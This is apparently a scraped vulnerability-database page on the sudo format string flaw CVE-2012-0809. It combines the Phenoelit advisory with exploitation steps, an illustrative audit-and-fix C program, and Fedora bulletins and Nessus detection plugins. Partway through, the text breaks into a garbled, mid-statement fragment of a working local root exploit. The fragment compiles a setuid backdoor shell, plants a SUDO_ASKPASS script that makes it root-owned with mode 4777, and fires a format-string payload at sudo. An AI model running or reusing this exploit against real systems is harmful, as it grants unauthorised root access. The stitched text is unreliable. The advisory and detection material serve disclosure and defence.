ID EDB-ID:18436 Type exploitdb Reporter joernchen Modified 2012-01-31T00:00:00
Description
sudo 1.8.0 - 1.8.3p1 Format String Vulnerability. CVE-2012-0809. DoS exploit for the Linux platform
Phenoelit Advisory <wir-haben-auch-mal-was-gefunden #0815 +--++>
[ Authors ]
joernchen <joernchen () phenoelit de>
Phenoelit Group (http://www.phenoelit.de)
[ Affected Products ]
sudo 1.8.0 - 1.8.3p1 (http://sudo.ws)
[ Vendor communication ]
2012-01-24 Sent vulnerability details to sudo maintainer
2012-01-24 Maintainer is embarrassed
2012-01-27 Asking maintainer how the fixing goes
2012-01-27 Maintainer responds with a patch and a release date
of 2012-01-30 for the patched sudo and advisory
2012-01-30 Release of this advisory
[ Description ]
Observe src/sudo.c:
void
sudo_debug(int level, const char *fmt, ...)
{
    va_list ap;
    char *fmt2;

    if (level > debug_level)
        return;

    /* Bracket fmt with program name and a newline to make it a single
       write */
    easprintf(&fmt2, "%s: %s\n", getprogname(), fmt);
    va_start(ap, fmt);
    vfprintf(stderr, fmt2, ap);
    va_end(ap);
    efree(fmt2);
}
Here getprogname() returns argv[0], which the invoking user controls (for
example through a symbolic link). argv[0] is therefore spliced into fmt2,
and fmt2 is then handed to vfprintf() as the format string. The result is
a format string vulnerability.
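The following C program is an added illustration and is not part of the advisory or of sudo's own code. It reproduces the composition step from sudo_debug() above (a program name spliced into the format before vfprintf), adds a small audit check that counts how many conversion directives the untrusted name contributed, and shows the hardened pattern in which the program name is passed as a %s argument while only the trusted literal is ever interpreted. The format "sudo_mode %d" and the symlink name "%n" are constructed sample inputs; the vulnerable format is never actually executed, only inspected.

```c
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Vulnerable composition, the same shape as sudo_debug() above: the program
 * name is spliced into the format string *before* it reaches v*printf.
 * The snprintf here is itself safe; the bug is that the returned string is
 * later used as a format.  Caller frees the result. */
char *compose_format_vulnerable(const char *progname, const char *fmt)
{
    size_t len = strlen(progname) + strlen(fmt) + 4;   /* ": " + "\n" + NUL */
    char *fmt2 = malloc(len);
    if (fmt2 == NULL)
        return NULL;
    snprintf(fmt2, len, "%s: %s\n", progname, fmt);
    return fmt2;
}

/* Count the conversion directives a format string will consume.
 * "%%" is a literal percent sign and consumes nothing. */
int count_directives(const char *fmt)
{
    int n = 0;
    for (const char *p = fmt; *p != '\0'; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {      /* escaped percent */
            p++;
            continue;
        }
        n++;
    }
    return n;
}

/* Audit check: how many directives did the untrusted program name add?
 * Anything above zero means vfprintf would read arguments the caller
 * never supplied (and, with %n, write through them). */
int extra_directives(const char *progname, const char *fmt)
{
    char *fmt2 = compose_format_vulnerable(progname, fmt);
    if (fmt2 == NULL)
        return -1;
    int extra = count_directives(fmt2) - count_directives(fmt);
    free(fmt2);
    return extra;
}

/* Hardened variant: the program name is passed as a %s *argument* and the
 * literal fmt is the only format string ever interpreted.  Writes into
 * out/outlen so the result can be inspected; returns bytes written or -1. */
int debug_hardened(char *out, size_t outlen, const char *progname,
                   const char *fmt, ...)
{
    va_list ap;
    size_t used;
    int n;

    n = snprintf(out, outlen, "%s: ", progname);   /* progname is data here */
    if (n < 0 || (size_t)n >= outlen)
        return -1;
    used = (size_t)n;

    va_start(ap, fmt);
    n = vsnprintf(out + used, outlen - used, fmt, ap);  /* trusted literal */
    va_end(ap);
    if (n < 0 || (size_t)n >= outlen - used)
        return -1;
    used += (size_t)n;

    if (used + 1 >= outlen)
        return -1;
    out[used++] = '\n';
    out[used] = '\0';
    return (int)used;
}

/* Fixed-argument wrapper so the hardened path can be checked without varargs. */
int hardened_output_is(const char *progname, int level, const char *expected)
{
    char buf[128];
    if (debug_hardened(buf, sizeof buf, progname, "sudo_mode %d", level) < 0)
        return 0;
    return strcmp(buf, expected) == 0;
}

int main(void)
{
    const char *attacker_name = "%n";     /* constructed: the advisory's symlink name */
    const char *fmt = "sudo_mode %d";     /* constructed: a typical debug format */
    char *fmt2 = compose_format_vulnerable(attacker_name, fmt);
    char buf[128];

    printf("composed format : %s", fmt2);
    printf("directives      : %d (intended %d)\n",
           count_directives(fmt2), count_directives(fmt));
    free(fmt2);

    debug_hardened(buf, sizeof buf, attacker_name, fmt, 9);
    printf("hardened output : %s", buf);   /* "%n: sudo_mode 9" printed literally */
    return 0;
}
```

The extra_directives() check is the kind of invariant a code reviewer or fuzz harness can assert on any wrapper that builds a format string at run time: if the number of directives in the composed string differs from the number in the literal, untrusted data has reached the format. The hardened form removes the problem entirely rather than filtering percent signs, which is also why FORTIFY_SOURCE's %n check in the example below is a safety net and not a fix.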
[ Example ]
/tmp $ ln -s /usr/bin/sudo %n
/tmp $ ./%n -D9
*** %n in writable segment detected ***
Aborted
/tmp $
A note regarding exploitability: the above example shows the result of
FORTIFY_SOURCE, which makes exploitation painful but not impossible
(see [0]). Without FORTIFY_SOURCE the exploit is straightforward:
1. Use the format string to overwrite the setuid() call with setgid()
2. Trigger the format string with -D9
3. Make use of SUDO_ASKPASS and have shellcode in the askpass script
4. As askpass will be called after the format string has overwritten
   setuid(), the askpass script will run with uid 0
5. Enjoy the rootshell
[ Solution ]
Update to version 1.8.3.p2
[ References ]
[0] http://www.phrack.org/issues.html?issue=67&id=9
[ end of file ]
sudo_ver_cmd[50];\r\n snprintf(sudo_ver_cmd, sizeof(sudo)+3,\"%s -V\", sudo);\r\n fp = popen(sudo_ver_cmd, \"r\");\r\n\r\n if (fp == NULL) {\r\n printf(\"[-] Failed to get sudo's version\\n[-]Exiting..\" );\r\n exit(0);\r\n }\r\n fgets(path, 21, fp);\r\n memmove (s_version, path+13,5);\r\n for (i = 0; i < 4; i++){\r\n if (strcmp(s_version, vuln_sudo_versions[i]) == 0){\r\n printf(\"[+] Found a vuln sudo version: %s\\n\", s_version);\r\n returnval = 1;\r\n }\r\n }\r\n return returnval;\r\n};\r\n\r\nint write_backdoor(){\r\n int returnval = 1;\r\n char askpass[100], compile_bd[100];\r\n char bdcode[] = \"#include <stdio.h>\\r\\n\"\r\n \"#include <stdlib.h>\\r\\n\"\r\n \"int main(int argc, char **argv){\\r\\n\"\r\n \" printf(\\\"[+] Getting root..!\\\\n\\\");\\r\\n\"\r\n \" setresuid(0,0,0);\\r\\n\"\r\n \" printf(\\\"[+] Cleaning system.\\\\n\\\");\\r\\n\"\r\n \" remove(\\\"e\\\"); remove(\\\"e.c\\\"); remove(\\\"e.sh\\\");\\r\\n\"\r\n \" printf(\\\"[+] Launching root shell!\\\\n\\\");\\r\\n\"\r\n \" system(\\\"/bin/sh\\\");\\r\\n\"\r\n \" exit(0);\\r\\n\"\r\n \"}\\r\\n\";\r\n\r\n FILE *fp = fopen(BACKDOOR,\"wb\");\r\n if (fp == NULL) {\r\n printf(\"[-] Failed to write backdoor on the target, check your permissions\\n\" );\r\n returnval = -1;\r\n }else{\r\n printf(\"[+] Writing backdoor: %s\\n\", BACKDOOR);\r\n }\r\n\r\n fwrite(bdcode, 1, sizeof(bdcode)-1, fp); fclose(fp);\r\n memset(compile_bd, 0x00, sizeof(compile_bd));\r\n snprintf(compile_bd, sizeof(BACKDOOR)+sizeof(BD_COMPILED)+17,\"/usr/bin/gcc %s -o %s\", BACKDOOR, BD_COMPILED);\r\n printf(\"[+] Compiling backdoor: %s\\n\", BD_COMPILED);\r\n fp = popen(compile_bd, \"r\");\r\n\r\n if (fp == NULL) {\r\n printf(\"[-] Failed to compile the backdoor, check the gcc path\\n\" );\r\n returnval = -1;\r\n }\r\n\r\n fclose(fp);\r\n memset(askpass, 0x00, sizeof(askpass));\r\n snprintf(askpass, sizeof(BD_COMPILED)*2+39,\"#!/bin/sh\\nchown root:root %s\\nchmod 4777 %s\\n\", BD_COMPILED, BD_COMPILED);\r\n fp = 
fopen(SUDO_ASKPASS,\"w\");\r\n\r\n if (fp == NULL) {\r\n printf(\"[-] Failed to write backdoor on the target, check your permissions\\n\" );\r\n returnval = -1;\r\n }else{\r\n printf(\"[+] Writing SUDO_ASKPASS file: %s\\n\", SUDO_ASKPASS);\r\n }\r\n\r\n fwrite(askpass, 1, sizeof(askpass)-1, fp); fclose(fp);\r\n chmod(SUDO_ASKPASS, 0755);\r\n return returnval;\r\n};\r\n\r\nvoid *set_env(){\r\n int i = 0;\r\n char ld_preload_evar[OFFSET] = \"LD_PRELOAD=\";\r\n char user_details[OFFSET] = {0x1f, 0x46, 0x01, 0x40};\r\n char sudo_askpass_evar[40];\r\n for (i=0; i<(OFFSET/4); i++){\r\n memcpy(user_details+(i*4), user_details, sizeof(int));\r\n }\r\n\r\n memmove (ld_preload_evar+11, user_details , sizeof(user_details));\r\n memset(sudo_askpass_evar, 0x00, sizeof(sudo_askpass_evar));\r\n snprintf(sudo_askpass_evar, sizeof(SUDO_ASKPASS)+13,\"SUDO_ASKPASS=%s\", SUDO_ASKPASS);\r\n\r\n // set our environment\r\n putenv(ld_preload_evar);\r\n putenv(sudo_askpass_evar);\r\n};\r\n\r\nvoid *kill_sudo(){\r\n char fmtstring[] = \"%20$08n %*482$ %*2850$ %1073741824$\";\r\n char *args[] = { fmtstring, \"-D9\", \"-A\", \"\", NULL};\r\n\r\n // trigger the vuln\r\n execve(sudo, args, environ);\r\n};\r\n\r\nvoid *pop_shell(){\r\n // set our environment\r\n unsetenv(\"LD_PRELOAD\");\r\n unsetenv(\"SUDO_ASKPASS\");\r\n char *exploit_args[] = { BD_COMPILED, NULL };\r\n execve(BD_COMPILED, exploit_args, environ);\r\n};\r\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/25134/"}], "fedora": [{"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0809"], "description": "Sudo (superuser do) allows a system administrator to give certain users (or groups of users) the ability to run some (or all) commands as root while logging all commands and arguments. Sudo operates on a per-command basis. It is not a replacement for the shell. 
Features include: the ability to restrict what commands a user may run on a per-host basis, copious logging of each command (providing a clear audit trail of who did what), a configurable timeout of the sudo command, and the ability to use the same configuration file (sudoers) on many different machines. ", "modified": "2012-01-31T22:00:15", "published": "2012-01-31T22:00:15", "id": "FEDORA:C84D220DCB", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: sudo-1.8.3p1-2.fc16", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0809", "CVE-2012-2337"], "description": "Sudo (superuser do) allows a system administrator to give certain users (or groups of users) the ability to run some (or all) commands as root while logging all commands and arguments. Sudo operates on a per-command basis. It is not a replacement for the shell. Features include: the ability to restrict what commands a user may run on a per-host basis, copious logging of each command (providing a clear audit trail of who did what), a configurable timeout of the sudo command, and the ability to use the same configuration file (sudoers) on many different machines. ", "modified": "2012-07-12T18:56:05", "published": "2012-07-12T18:56:05", "id": "FEDORA:4755F20BEA", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: sudo-1.8.3p1-3.fc16", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-12T10:09:52", "description": " - fixed CVE-2012-0809\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 13, "published": "2012-02-01T00:00:00", "title": "Fedora 16 : sudo-1.8.3p1-2.fc16 (2012-1028)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0809"], "modified": "2012-02-01T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:sudo", "cpe:/o:fedoraproject:fedora:16"], "id": "FEDORA_2012-1028.NASL", "href": "https://www.tenable.com/plugins/nessus/57757", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-1028.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57757);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-0809\");\n script_bugtraq_id(51719);\n script_xref(name:\"FEDORA\", value:\"2012-1028\");\n\n script_name(english:\"Fedora 16 : sudo-1.8.3p1-2.fc16 (2012-1028)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - fixed CVE-2012-0809\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=784443\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-January/072651.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f66dd444\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected sudo package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/01/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) 
audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"sudo-1.8.3p1-2.fc16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"sudo\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-05T11:12:05", "description": "sudo was prone to a format string vulnerability", "edition": 14, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : sudo (openSUSE-2012-73)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0809"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:sudo-debuginfo", "cpe:/o:novell:opensuse:12.1", "p-cpe:/a:novell:opensuse:sudo-devel", "p-cpe:/a:novell:opensuse:sudo", "p-cpe:/a:novell:opensuse:sudo-debugsource"], "id": "OPENSUSE-2012-73.NASL", "href": "https://www.tenable.com/plugins/nessus/74791", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2012-73.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(74791);\n 
script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/04\");\n\n script_cve_id(\"CVE-2012-0809\");\n\n script_name(english:\"openSUSE Security Update : sudo (openSUSE-2012-73)\");\n script_summary(english:\"Check for the openSUSE-2012-73 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\"sudo was prone to a format string vulnerability\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=743300\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected sudo packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:sudo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:sudo-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:sudo-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/01/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2020 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n 
script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.1\", reference:\"sudo-1.8.2-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"sudo-debuginfo-1.8.2-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"sudo-debugsource-1.8.2-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"sudo-devel-1.8.2-2.5.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"sudo / sudo-debuginfo / sudo-debugsource / sudo-devel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:46:07", "description": "Todd Miller reports :\n\nSudo 1.8.0 introduced simple debugging support that was primarily\nintended for use when developing policy or I/O logging plugins. The\nsudo_debug() function contains a flaw where the program name is used\nas part of the format string passed to the fprintf() function. 
The\nprogram name can be controlled by the caller, either via a symbolic\nlink or, on some systems, by setting argv[0] when executing sudo.\n\nUsing standard format string vulnerability exploitation techniques it\nis possible to leverage this bug to achieve root privileges.\n\nExploitation of the bug does not require that the attacker be listed\nin the sudoers file. As such, we strongly suggest that affected sites\nupgrade from affected sudo versions as soon as possible.", "edition": 21, "published": "2012-01-31T00:00:00", "title": "FreeBSD : sudo -- format string vulnerability (7c920bb7-4b5f-11e1-9f47-00e0815b8da8)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0809"], "modified": "2012-01-31T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:sudo", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_7C920BB74B5F11E19F4700E0815B8DA8.NASL", "href": "https://www.tenable.com/plugins/nessus/57739", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. 
Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57739);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2012-0809\");\n\n script_name(english:\"FreeBSD : sudo -- format string vulnerability (7c920bb7-4b5f-11e1-9f47-00e0815b8da8)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Todd Miller reports :\n\nSudo 1.8.0 introduced simple debugging support that was primarily\nintended for use when developing policy or I/O logging plugins. 
The\nsudo_debug() function contains a flaw where the program name is used\nas part of the format string passed to the fprintf() function. The\nprogram name can be controlled by the caller, either via a symbolic\nlink or, on some systems, by setting argv[0] when executing sudo.\n\nUsing standard format string vulnerability exploitation techniques it\nis possible to leverage this bug to achieve root privileges.\n\nExploitation of the bug does not require that the attacker be listed\nin the sudoers file. As such, we strongly suggest that affected sites\nupgrade from affected sudo versions as soon as possible.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.gratisoft.us/sudo/alerts/sudo_debug.html\"\n );\n # https://vuxml.freebsd.org/freebsd/7c920bb7-4b5f-11e1-9f47-00e0815b8da8.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?52b68937\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/01/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/01/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/01/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"sudo>=1.8.0<1.8.3_2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:53:30", "description": "The remote host is affected by the vulnerability described in GLSA-201203-06\n(sudo: Privilege escalation)\n\n Two vulnerabilities have been discovered in sudo:\n When the sudoers file is configured with a Runas group, sudo does not\n prompt for a password when changing to the new group (CVE-2011-0010).\n A format string vulnerability exists in the 'sudo_debug()' function\n (CVE-2012-0809).\n \nImpact :\n\n A local attacker could possibly gain the ability to run arbitrary\n commands with the privileges of other users or groups, including root.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 21, "published": "2012-03-06T00:00:00", "title": "GLSA-201203-06 : sudo: Privilege escalation", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0809", "CVE-2011-0010"], "modified": "2012-03-06T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:sudo"], "id": "GENTOO_GLSA-201203-06.NASL", "href": "https://www.tenable.com/plugins/nessus/58216", "sourceData": "#%NASL_MIN_LEVEL 
70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201203-06.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58216);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-0010\", \"CVE-2012-0809\");\n script_bugtraq_id(45774, 51719);\n script_xref(name:\"GLSA\", value:\"201203-06\");\n\n script_name(english:\"GLSA-201203-06 : sudo: Privilege escalation\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201203-06\n(sudo: Privilege escalation)\n\n Two vulnerabilities have been discovered in sudo:\n When the sudoers file is configured with a Runas group, sudo does not\n 